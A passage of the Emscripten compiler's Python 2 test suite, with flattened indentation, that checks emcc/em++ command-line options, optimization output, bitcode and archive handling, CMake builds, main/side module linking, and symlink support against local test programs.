asm2x86 = make_run("asm2x86", compiler=CLANG, emcc_args=["-O2", "-g", "-s", "CHECK_HEAP_ALIGN=1"], env={"EMCC_LLVM_TARGET": "i386-pc-linux-gnu"})
# Make custom runs with various options
for compiler, quantum, embetter, typed_arrays in [
(CLANG, 4, 0, 0),
(CLANG, 4, 1, 1),
]:
fullname = 's_0_%d%s%s' % (
embetter, '' if quantum == 4 else '_q' + str(quantum), '' if typed_arrays in [0, 1] else '_t' + str(typed_arrays)
)
locals()[fullname] = make_run(fullname, fullname, compiler, embetter, quantum, typed_arrays)
del T # T is just a shape for the specific subclasses, we don't test it itself
class other(RunnerCore):
def test_emcc(self):
for compiler in [EMCC, EMXX]:
shortcompiler = os.path.basename(compiler)
suffix = '.c' if compiler == EMCC else '.cpp'
# --version
output = Popen([PYTHON, compiler, '--version'], stdout=PIPE, stderr=PIPE).communicate()
output = output[0].replace('\r', '')
self.assertContained('''emcc (Emscripten GCC-like replacement)''', output)
self.assertContained('''Copyright (C) 2013 the Emscripten authors (see AUTHORS.txt)
This is free and open source software under the MIT license.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
''', output)
# -v, without input files
output = Popen([PYTHON, compiler, '-v'], stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''clang version''', output[1].replace('\r', ''), output[1].replace('\r', ''))
# --help
output = Popen([PYTHON, compiler, '--help'], stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''%s [options] file...
Most normal gcc/g++ options will work, for example:
--help Display this information
--version Display compiler version information
Options that are modified or new in %s include:
-O0 No optimizations (default)
''' % (shortcompiler, shortcompiler), output[0].replace('\r', ''), output[1].replace('\r', ''))
# emcc src.cpp ==> writes a.out.js
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix)], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
# properly report source code errors, and stop there
self.clear()
assert not os.path.exists('a.out.js')
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world_error' + suffix)], stdout=PIPE, stderr=PIPE)
output = process.communicate()
assert not os.path.exists('a.out.js'), 'compilation failed, so no output file is expected'
assert len(output[0]) == 0, output[0]
assert process.returncode != 0, 'Failed compilation must return a nonzero error code!'
self.assertNotContained('IOError', output[1]) # no python stack
self.assertNotContained('Traceback', output[1]) # no python stack
self.assertContained('error: invalid preprocessing directive', output[1])
self.assertContained(["error: use of undeclared identifier 'cheez", "error: unknown type name 'cheez'"], output[1])
self.assertContained('errors generated', output[1])
assert 'compiler frontend failed to generate LLVM bitcode, halting' in output[1].split('errors generated.')[1]
# emcc src.cpp -c and emcc src.cpp -o src.[o|bc] ==> should give a .bc file
# regression check: -o js should create "js", with bitcode content
for args in [['-c'], ['-o', 'src.o'], ['-o', 'src.bc'], ['-o', 'src.so'], ['-o', 'js']]:
target = args[1] if len(args) == 2 else 'hello_world.o'
self.clear()
Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix)] + args, stdout=PIPE, stderr=PIPE).communicate()
syms = Building.llvm_nm(target)
assert len(syms.defs) == 1 and 'main' in syms.defs, 'Failed to generate valid bitcode'
if target == 'js': # make sure emcc can recognize the target as a bitcode file
shutil.move(target, target + '.bc')
target += '.bc'
output = Popen([PYTHON, compiler, target, '-o', target + '.js'], stdout = PIPE, stderr = PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists(target + '.js'), 'Expected %s to exist since args are %s : %s' % (target + '.js', str(args), '\n'.join(output))
self.assertContained('hello, world!', run_js(target + '.js'))
# handle singleton archives
self.clear()
Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix), '-o', 'a.bc'], stdout=PIPE, stderr=PIPE).communicate()
Popen([LLVM_AR, 'r', 'a.a', 'a.bc'], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('a.a')
output = Popen([PYTHON, compiler, 'a.a']).communicate()
assert os.path.exists('a.out.js'), output
self.assertContained('hello, world!', run_js('a.out.js'))
# emcc src.ll ==> generates .js
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.ll')], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
# emcc [..] -o [path] ==> should work with absolute paths
try:
for path in [os.path.abspath(os.path.join('..', 'file1.js')), os.path.join('b_dir', 'file2.js')]:
print path
self.clear(in_curr=True)
os.chdir(self.get_dir())
if not os.path.exists('a_dir'): os.mkdir('a_dir')
os.chdir('a_dir')
if not os.path.exists('b_dir'): os.mkdir('b_dir')
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.ll'), '-o', path], stdout=PIPE, stderr=PIPE).communicate()
print output
assert os.path.exists(path), path + ' does not exist; ' + '\n'.join(output)
last = os.getcwd()
os.chdir(os.path.dirname(path))
self.assertContained('hello, world!', run_js(os.path.basename(path)))
os.chdir(last)
finally:
os.chdir(self.get_dir())
self.clear()
# dlmalloc. dlmalloc is special in that it is the only part of libc that is (1) hard to write well, and
# (2) very speed-sensitive. So we do not implement it in JS in library.js; instead we compile it from source
for source, has_malloc in [('hello_world' + suffix, False), ('hello_malloc.cpp', True)]:
print source, has_malloc
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', source)], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
generated = open('a.out.js').read()
assert ('function _malloc(bytes) {' in generated) == (not has_malloc), 'the JS malloc stub should be present exactly when real malloc is not needed'
# Optimization: emcc src.cpp -o something.js [-Ox]. -O0 is the same as not specifying any optimization setting
for params, opt_level, bc_params, closure, has_malloc in [ # bc params are used after compiling to bitcode
(['-o', 'something.js'], 0, None, 0, 1),
(['-o', 'something.js', '-O0'], 0, None, 0, 0),
(['-o', 'something.js', '-O1'], 1, None, 0, 0),
(['-o', 'something.js', '-O1', '-g'], 1, None, 0, 0), # no closure since debug
(['-o', 'something.js', '-O1', '--closure', '1'], 1, None, 1, 0),
(['-o', 'something.js', '-O1', '--closure', '1', '-s', 'ASM_JS=0'], 1, None, 1, 0),
(['-o', 'something.js', '-O2'], 2, None, 0, 1),
(['-o', 'something.js', '-O2', '-g'], 2, None, 0, 0),
(['-o', 'something.js', '-Os'], 2, None, 0, 1),
(['-o', 'something.js', '-O3', '-s', 'ASM_JS=0'], 3, None, 1, 1),
# and, test compiling to bitcode first
(['-o', 'something.bc'], 0, [], 0, 0),
(['-o', 'something.bc', '-O0'], 0, [], 0, 0),
(['-o', 'something.bc', '-O1'], 1, ['-O1'], 0, 0),
(['-o', 'something.bc', '-O2'], 2, ['-O2'], 0, 0),
(['-o', 'something.bc', '-O3'], 3, ['-O3', '-s', 'ASM_JS=0'], 1, 0),
(['-O1', '-o', 'something.bc'], 1, [], 0, 0),
]:
print params, opt_level, bc_params, closure, has_malloc
self.clear()
keep_debug = '-g' in params
args = [PYTHON, compiler, path_from_root('tests', 'hello_world_loop' + ('_malloc' if has_malloc else '') + '.cpp')] + params
print '..', args
output = Popen(args,
stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
if bc_params is not None:
assert os.path.exists('something.bc'), output[1]
bc_args = [PYTHON, compiler, 'something.bc', '-o', 'something.js'] + bc_params
print '....', bc_args
output = Popen(bc_args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('something.js'), output[1]
assert ('Applying some potentially unsafe optimizations!' in output[1]) == (opt_level >= 3), 'unsafe warning should appear in opt >= 3'
self.assertContained('hello, world!', run_js('something.js'))
# Verify optimization level etc. in the generated code
# XXX these are quite sensitive, and will need updating when code generation changes
generated = open('something.js').read() # TODO: parse out the _main function itself, not support code, if the tests below need that some day
assert 'new Uint16Array' in generated and 'new Uint32Array' in generated, 'typed arrays 2 should be used by default'
assert 'SAFE_HEAP' not in generated, 'safe heap should not be used by default'
assert ': while(' not in generated, 'when relooping we also js-optimize, so there should be no labelled whiles'
if closure:
if opt_level == 0: assert 'Module._main =' in generated, 'closure compiler should have been run'
elif opt_level >= 1: assert 'Module._main=' in generated, 'closure compiler should have been run (and output should be minified)'
else:
# closure has not been run, we can do some additional checks. TODO: figure out how to do these even with closure
assert 'Module._main = ' not in generated, 'closure compiler should not have been run'
if keep_debug:
assert ('(label)' in generated or '(label | 0)' in generated) == (opt_level <= 1), 'relooping should be in opt >= 2'
assert ('assert(STACKTOP < STACK_MAX' in generated) == (opt_level == 0), 'assertions should be in opt == 0'
assert 'var $i;' in generated or 'var $i_0' in generated or 'var $storemerge3;' in generated or 'var $storemerge4;' in generated or 'var $i_04;' in generated or 'var $original = 0' in generated, 'micro opts should always be on'
if opt_level >= 2 and '-g' in params:
assert re.search('HEAP8\[\$?\w+ ?\+ ?\(+\$?\w+ ?', generated) or re.search('HEAP8\[HEAP32\[', generated), 'eliminator should create compound expressions, and fewer one-time vars' # also in -O1, but easier to test in -O2
assert ('_puts(' in generated) == (opt_level >= 1), 'with opt >= 1, llvm opts are run and they should optimize printf to puts'
if opt_level == 0 or '-g' in params: assert 'function _main() {' in generated, 'Should be unminified, including whitespace'
elif opt_level >= 2: assert ('function _main(){' in generated or '"use asm";var a=' in generated), 'Should be whitespace-minified'
# emcc -s RELOOP=1 src.cpp ==> should pass -s to emscripten.py. --typed-arrays is a convenient alias for -s USE_TYPED_ARRAYS
for params, test, text in [
(['-O2'], lambda generated: 'function intArrayToString' in generated, 'shell has unminified utilities'),
(['-O2', '--closure', '1'], lambda generated: 'function intArrayToString' not in generated, 'closure minifies the shell'),
(['-O2'], lambda generated: 'var b=0' in generated and not 'function _main' in generated, 'registerize/minify is run by default in -O2'),
(['-O2', '--minify', '0'], lambda generated: 'var b = 0' in generated and not 'function _main' in generated, 'minify is cancelled, but not registerize'),
(['-O2', '-g'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'registerize/minify is cancelled by -g'),
(['-O2', '-g0'], lambda generated: 'var b=0' in generated and not 'function _main' in generated, 'registerize/minify is run by default in -O2 -g0'),
(['-O2', '-g1'], lambda generated: 'var b = 0' in generated and not 'function _main' in generated, 'compress is cancelled by -g1'),
(['-O2', '-g2'], lambda generated: ('var b = 0' in generated or 'var i1 = 0' in generated) and 'function _main' in generated, 'minify is cancelled by -g2'),
(['-O2', '-g3'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'registerize is cancelled by -g3'),
#(['-O2', '-g4'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'same as -g3 for now'),
(['-s', 'INLINING_LIMIT=0'], lambda generated: 'function _dump' in generated, 'no inlining without opts'),
(['-O3', '-s', 'INLINING_LIMIT=0', '--closure', '0'], lambda generated: 'function _dump' not in generated, 'lto/inlining'),
(['-Os', '--llvm-lto', '1', '-s', 'ASM_JS=0'], lambda generated: 'function _dump' in generated, '-Os disables inlining'),
(['-s', 'USE_TYPED_ARRAYS=0'], lambda generated: 'new Int32Array' not in generated, 'disable typed arrays'),
(['-s', 'USE_TYPED_ARRAYS=1'], lambda generated: 'IHEAPU = ' in generated, 'typed arrays 1 selected'),
([], lambda generated: 'Module["_dump"]' not in generated, 'dump is not exported by default'),
(['-s', 'EXPORTED_FUNCTIONS=["_main", "_dump"]'], lambda generated: 'Module["_dump"]' in generated, 'dump is now exported'),
(['--typed-arrays', '0'], lambda generated: 'new Int32Array' not in generated, 'disable typed arrays'),
(['--typed-arrays', '1'], lambda generated: 'IHEAPU = ' in generated, 'typed arrays 1 selected'),
(['--typed-arrays', '2'], lambda generated: 'new Uint16Array' in generated and 'new Uint32Array' in generated, 'typed arrays 2 selected'),
(['--llvm-opts', '1'], lambda generated: '_puts(' in generated, 'llvm opts requested'),
]:
print params, text
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world_loop.cpp'), '-o', 'a.out.js'] + params, stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
assert test(open('a.out.js').read()), text
# Compiling two source files into a final JS.
for args, target in [([], 'a.out.js'), (['-o', 'combined.js'], 'combined.js')]:
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'twopart_main.cpp'), path_from_root('tests', 'twopart_side.cpp')] + args,
stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists(target), '\n'.join(output)
self.assertContained('side got: hello from main, over', run_js(target))
# Compiling two files with -c will generate separate .bc files
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'twopart_main.cpp'), path_from_root('tests', 'twopart_side.cpp'), '-c'] + args,
stdout=PIPE, stderr=PIPE).communicate()
if '-o' in args:
# specifying -o and -c is an error
assert 'fatal error' in output[1], output[1]
continue
assert os.path.exists('twopart_main.o'), '\n'.join(output)
assert os.path.exists('twopart_side.o'), '\n'.join(output)
assert not os.path.exists(target), 'We should only have created bitcode here: ' + '\n'.join(output)
# Compiling one of them alone is expected to fail
output = Popen([PYTHON, compiler, 'twopart_main.o', '-O1', '-g'] + args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(target), '\n'.join(output)
#print '\n'.join(output)
self.assertContained('missing function', run_js(target, stderr=STDOUT))
try_delete(target)
# Combining those bc files into js should work
output = Popen([PYTHON, compiler, 'twopart_main.o', 'twopart_side.o'] + args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(target), '\n'.join(output)
self.assertContained('side got: hello from main, over', run_js(target))
# Combining bc files into another bc should also work
try_delete(target)
assert not os.path.exists(target)
output = Popen([PYTHON, compiler, 'twopart_main.o', 'twopart_side.o', '-o', 'combined.bc'] + args, stdout=PIPE, stderr=PIPE).communicate()
syms = Building.llvm_nm('combined.bc')
assert len(syms.defs) == 2 and 'main' in syms.defs, 'Failed to generate valid bitcode'
output = Popen([PYTHON, compiler, 'combined.bc', '-o', 'combined.bc.js'], stdout = PIPE, stderr = PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('combined.bc.js'), 'Expected %s to exist' % ('combined.bc.js')
self.assertContained('side got: hello from main, over', run_js('combined.bc.js'))
# --js-transform <transform>
self.clear()
trans = os.path.join(self.get_dir(), 't.py')
trans_file = open(trans, 'w')
trans_file.write('''
import sys
f = open(sys.argv[1], 'w')
f.write('transformed!')
f.close()
''')
trans_file.close()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix), '--js-transform', '%s t.py' % (PYTHON)], stdout=PIPE, stderr=PIPE).communicate()
assert open('a.out.js').read() == 'transformed!', 'Transformed output must be as expected'
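# Note: the transform script is handed the path of the generated JS as its
# only argument and may rewrite that file in place, as t.py does above.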
# TODO: Add in files test a clear example of using disablePermissions, and link to it from the wiki
# TODO: test normal project linking, static and dynamic: get_library should not need to be told what to link!
# TODO: deprecate llvm optimizations, dlmalloc, etc. in emscripten.py.
def test_cmake(self):
# On Windows, we want to build cmake-generated Makefiles with mingw32-make instead of e.g. cygwin make, since mingw32-make
# understands Windows paths, and cygwin make additionally produces cryptic 'not valid bitcode file' errors on files that
# *are* valid bitcode files.
if os.name == 'nt':
make_command = 'mingw32-make'
emscriptencmaketoolchain = path_from_root('cmake', 'Platform', 'Emscripten.cmake')
else:
make_command = 'make'
emscriptencmaketoolchain = path_from_root('cmake', 'Platform', 'Emscripten_unix.cmake')
cmake_cases = ['target_js', 'target_html']
cmake_outputs = ['hello_world.js', 'hello_world_gles.html']
for i in range(0, 2):
for configuration in ['Debug', 'Release']:
# Create a temp workspace folder
cmakelistsdir = path_from_root('tests', 'cmake', cmake_cases[i])
tempdirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
try:
os.chdir(tempdirname)
# Run Cmake
cmd = ['cmake', '-DCMAKE_TOOLCHAIN_FILE='+emscriptencmaketoolchain,
'-DCMAKE_BUILD_TYPE=' + configuration,
'-DCMAKE_MODULE_PATH=' + path_from_root('cmake').replace('\\', '/'),
'-G' 'Unix Makefiles', cmakelistsdir]
ret = Popen(cmd, stdout=PIPE, stderr=PIPE).communicate()
if ret[1] is not None and len(ret[1].strip()) > 0:
print >> sys.stderr, ret[1] # If there were any errors, print them directly to console for diagnostics.
if 'error' in ret[1].lower():
print >> sys.stderr, 'Failed command: ' + ' '.join(cmd)
print >> sys.stderr, 'Result:\n' + ret[1]
raise Exception('cmake call failed!')
assert os.path.exists(tempdirname + '/Makefile'), 'CMake call did not produce a Makefile!'
# Build
cmd = [make_command]
ret = Popen(cmd, stdout=PIPE).communicate()
if ret[1] is not None and len(ret[1].strip()) > 0:
print >> sys.stderr, ret[1] # If there were any errors, print them directly to console for diagnostics.
if 'error' in ret[0].lower() and '0 error(s)' not in ret[0].lower():
print >> sys.stderr, 'Failed command: ' + ' '.join(cmd)
print >> sys.stderr, 'Result:\n' + ret[0]
raise Exception('make failed!')
assert os.path.exists(tempdirname + '/' + cmake_outputs[i]), 'Building a cmake-generated Makefile failed to produce an output file %s!' % (tempdirname + '/' + cmake_outputs[i])
# Run through node, if CMake produced a .js file.
if cmake_outputs[i].endswith('.js'):
ret = Popen(listify(NODE_JS) + [tempdirname + '/' + cmake_outputs[i]], stdout=PIPE).communicate()[0]
assert 'hello, world!' in ret, 'Running cmake-based .js application failed!'
finally:
os.chdir(path_from_root('tests')) # Move away from the directory we are about to remove.
shutil.rmtree(tempdirname)
def test_failure_error_code(self):
for compiler in [EMCC, EMXX]:
# Test that if one file is missing from the build, then emcc shouldn't succeed, and shouldn't try to produce an output file.
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.c'), 'this_file_is_missing.c', '-o', 'this_output_file_should_never_exist.js'], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode != 0, 'Trying to compile a nonexistent file should return a nonzero error code!'
assert os.path.exists('this_output_file_should_never_exist.js') == False, 'Emcc should not produce an output file when build fails!'
def test_cxx03(self):
for compiler in [EMCC, EMXX]:
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_cxx03.cpp')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode == 0, 'By default, emscripten should build using -std=c++03!'
def test_cxx11(self):
for compiler in [EMCC, EMXX]:
process = Popen([PYTHON, compiler, '-std=c++11', path_from_root('tests', 'hello_cxx11.cpp')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode == 0, 'User should be able to specify a custom -std= on the command line!'
def test_catch_undef(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <vector>
#include <stdio.h>
class Test {
public:
std::vector<int> vector;
};
Test globalInstance;
int main() {
printf("hello, world!\n");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-fsanitize=undefined']).communicate()
self.assertContained('hello, world!', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_unaligned_memory(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <stdio.h>
typedef unsigned char Bit8u;
typedef unsigned short Bit16u;
typedef unsigned int Bit32u;
int main()
{
Bit8u data[4] = {0x01,0x23,0x45,0x67};
printf("data: %x\n", *(Bit32u*)data);
printf("data[0,1] 16bit: %x\n", *(Bit16u*)data);
printf("data[1,2] 16bit: %x\n", *(Bit16u*)(data+1));
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-s', 'UNALIGNED_MEMORY=1']).communicate()
self.assertContained('data: 67452301\ndata[0,1] 16bit: 2301\ndata[1,2] 16bit: 4523', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_unaligned_memory_2(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <string>
#include <stdio.h>
int main( int argc, char ** argv )
{
std::string testString( "Hello, World!" );
printf( "testString = %s\n", testString.c_str() );
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-s', 'UNALIGNED_MEMORY=1']).communicate()
self.assertContained('testString = Hello, World!', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_asm_minify(self):
def test(args):
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop_malloc.cpp')] + args).communicate()
self.assertContained('hello, world!', run_js(self.in_dir('a.out.js')))
return open(self.in_dir('a.out.js')).read()
src = test([])
assert 'function _malloc' in src
src = test(['-O2', '-s', 'ASM_JS=1'])
normal_size = len(src)
print 'normal', normal_size
assert 'function _malloc' not in src
src = test(['-O2', '-s', 'ASM_JS=1', '--minify', '0'])
unminified_size = len(src)
print 'unminified', unminified_size
assert unminified_size > normal_size
assert 'function _malloc' not in src
src = test(['-O2', '-s', 'ASM_JS=1', '-g'])
debug_size = len(src)
print 'debug', debug_size
assert debug_size > unminified_size
assert 'function _malloc' in src
def test_dangerous_func_cast(self):
src = r'''
#include <stdio.h>
typedef void (*voidfunc)();
int my_func() {
printf("my func\n");
return 10;
}
int main(int argc, char **argv) {
voidfunc fps[10];
for (int i = 0; i < 10; i++) fps[i] = (i == argc) ? (void (*)())my_func : NULL;
fps[2*(argc-1) + 1]();
return 0;
}
'''
open('src.c', 'w').write(src)
def test(args, expected, err_expected=None):
out, err = Popen([PYTHON, EMCC, 'src.c'] + args, stderr=PIPE).communicate()
if err_expected: self.assertContained(err_expected, err)
self.assertContained(expected, run_js(self.in_dir('a.out.js'), stderr=PIPE, full_output=True))
return open(self.in_dir('a.out.js')).read()
test([], 'my func') # no asm, so casting func works
test(['-O2'], 'abort', ['Casting potentially incompatible function pointer i32 ()* to void (...)*, for my_func',
'Incompatible function pointer casts are very dangerous with ASM_JS=1, you should investigate and correct these']) # asm, so failure
test(['-O2', '-s', 'ASSERTIONS=1'],
'Invalid function pointer called. Perhaps a miscast function pointer (check compilation warnings) or bad vtable lookup (maybe due to derefing a bad pointer, like NULL)?',
['Casting potentially incompatible function pointer i32 ()* to void (...)*, for my_func',
'Incompatible function pointer casts are very dangerous with ASM_JS=1, you should investigate and correct these']) # asm, so failure
def test_l_link(self):
# Linking with -lLIBNAME and -L/DIRNAME should work
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'libdir'))
except:
pass
open(os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib\\n");
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), '-c']).communicate()
shutil.move(os.path.join(self.get_dir(), 'libfile.o'), os.path.join(self.get_dir(), 'libdir', 'libfile.so'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile']).communicate()
self.assertContained('hello from lib', run_js(os.path.join(self.get_dir(), 'a.out.js')))
assert not os.path.exists('a.out') and not os.path.exists('a.exe'), 'Must not leave unneeded linker stubs'
def test_static_link(self):
def test(name, header, main, side, expected, args=[], suffix='cpp', first=True):
print name
#t = main ; main = side ; side = t
original_main = main
original_side = side
if header: open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
if type(main) == str:
open(os.path.join(self.get_dir(), 'main.' + suffix), 'w').write(main)
main = ['main.' + suffix]
if type(side) == str:
open(os.path.join(self.get_dir(), 'side.' + suffix), 'w').write(side)
side = ['side.' + suffix]
Popen([PYTHON, EMCC] + side + ['-o', 'side.js', '-s', 'SIDE_MODULE=1', '-O2'] + args).communicate()
# TODO: test with and without DISABLE_GL_EMULATION, check that file sizes change
Popen([PYTHON, EMCC] + main + ['-o', 'main.js', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'DISABLE_GL_EMULATION=1'] + args).communicate()
Popen([PYTHON, EMLINK, 'main.js', 'side.js', 'together.js'], stdout=PIPE).communicate()
assert os.path.exists('together.js')
for engine in JS_ENGINES:
out = run_js('together.js', engine=engine, stderr=PIPE, full_output=True)
self.assertContained(expected, out)
if engine == SPIDERMONKEY_ENGINE: self.validate_asmjs(out)
if first:
shutil.copyfile('together.js', 'first.js')
test(name + ' (reverse)', header, original_side, original_main, expected, args, suffix, False) # test reverse order
# test a simple call from one module to another. only one has a string (and constant memory initialization for it)
test('basics', '', '''
#include <stdio.h>
extern int sidey();
int main() {
printf("other says %d.", sidey());
return 0;
}
''', '''
int sidey() { return 11; }
''', 'other says 11.')
# finalization of float variables should pass asm.js validation
test('floats', '', '''
#include <stdio.h>
extern float sidey();
int main() {
printf("other says %.2f.", sidey()+1);
return 0;
}
''', '''
float sidey() { return 11.5; }
''', 'other says 12.50')
# memory initialization in both
test('multiple memory inits', '', r'''
#include <stdio.h>
extern void sidey();
int main() {
printf("hello from main\n");
sidey();
return 0;
}
''', r'''
#include <stdio.h>
void sidey() { printf("hello from side\n"); }
''', 'hello from main\nhello from side\n')
# function pointers
test('fp1', 'typedef void (*voidfunc)();', r'''
#include <stdio.h>
#include "header.h"
voidfunc sidey(voidfunc f);
void a() { printf("hello from funcptr\n"); }
int main() {
sidey(a)();
return 0;
}
''', '''
#include "header.h"
voidfunc sidey(voidfunc f) { return f; }
''', 'hello from funcptr\n')
# Global initializer
test('global init', '', r'''
#include <stdio.h>
struct Class {
Class() { printf("a new Class\n"); }
};
static Class c;
int main() {
return 0;
}
''', r'''
void nothing() {}
''', 'a new Class\n')
# Multiple global initializers (LLVM generates overlapping names for them)
test('global inits', r'''
#include <stdio.h>
struct Class {
Class(const char *name) { printf("new %s\n", name); }
};
''', r'''
#include "header.h"
static Class c("main");
int main() {
return 0;
}
''', r'''
#include "header.h"
static Class c("side");
''', ['new main\nnew side\n', 'new side\nnew main\n'])
# Class code used across modules
test('codecall', r'''
#include <stdio.h>
struct Class {
Class(const char *name);
};
''', r'''
#include "header.h"
int main() {
Class c("main");
return 0;
}
''', r'''
#include "header.h"
Class::Class(const char *name) { printf("new %s\n", name); }
''', ['new main\n'])
# malloc usage in both modules
test('malloc', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
''', r'''
#include <stdio.h>
#include "header.h"
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
puts(ret);
return 0;
}
''', r'''
#include "header.h"
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''', ['hello through side\n'])
# libc usage in one module. We must force libc inclusion in the main module if it isn't the one using mallinfo()
try:
os.environ['EMCC_FORCE_STDLIBS'] = 'libc'
test('malloc-1', r'''
#include <string.h>
int side();
''', r'''
#include <stdio.h>
#include "header.h"
int main() {
printf("|%d|\n", side());
return 0;
}
''', r'''
#include <stdlib.h>
#include <malloc.h>
#include "header.h"
int side() {
struct mallinfo m = mallinfo();
return m.arena > 1;
}
''', ['|1|\n'])
finally:
del os.environ['EMCC_FORCE_STDLIBS']
# iostream usage in one and std::string in both
test('iostream', r'''
#include <iostream>
#include <string>
std::string side();
''', r'''
#include "header.h"
int main() {
std::cout << "hello from main " << side() << std::endl;
return 0;
}
''', r'''
#include "header.h"
std::string side() { return "and hello from side"; }
''', ['hello from main and hello from side\n'])
# zlib compression library. tests function pointers in initializers and many other things
test('zlib', '', open(path_from_root('tests', 'zlib', 'example.c'), 'r').read(),
self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']),
open(path_from_root('tests', 'zlib', 'ref.txt'), 'r').read(),
args=['-I' + path_from_root('tests', 'zlib')], suffix='c')
# bullet physics engine. tests all the things
test('bullet', '', open(path_from_root('tests', 'bullet', 'Demos', 'HelloWorld', 'HelloWorld.cpp'), 'r').read(),
self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')]),
[open(path_from_root('tests', 'bullet', 'output.txt'), 'r').read(), # different roundings
open(path_from_root('tests', 'bullet', 'output2.txt'), 'r').read(),
open(path_from_root('tests', 'bullet', 'output3.txt'), 'r').read()],
args=['-I' + path_from_root('tests', 'bullet', 'src')])
def test_symlink(self):
if os.name == 'nt':
return self.skip('Windows FS does not need to be tested for symlink support, since it does not have symlinks.')
open(os.path.join(self.get_dir(), 'foobar.xxx'), 'w').write('int main(){ return 0; }')
os.symlink(os.path.join(self.get_dir(), 'foobar.xxx'), os.path.join(self.get_dir(), 'foobar.c'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foobar.c'), '-o', os.path.join(self.get_dir(), 'foobar')], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar.xxx'))
try_delete(os.path.join(self.get_dir(), 'foobar.c'))
open(os.path.join(self.get_dir(), 'foobar.c'), 'w').write('int main(){ return 0; }')
os.symlink(os.path.join(self.get_dir(), 'foobar.c'), os.path.join(self.get_dir(), 'foobar.xxx'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foobar.xxx'), '-o', os.path.join(self.get_dir(), 'foobar')], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar'))
try_delete(os.path.join(self.get_dir(), 'foobar.xxx'))
try_delete(os.path.join(self.get_dir(), 'foobar.c'))
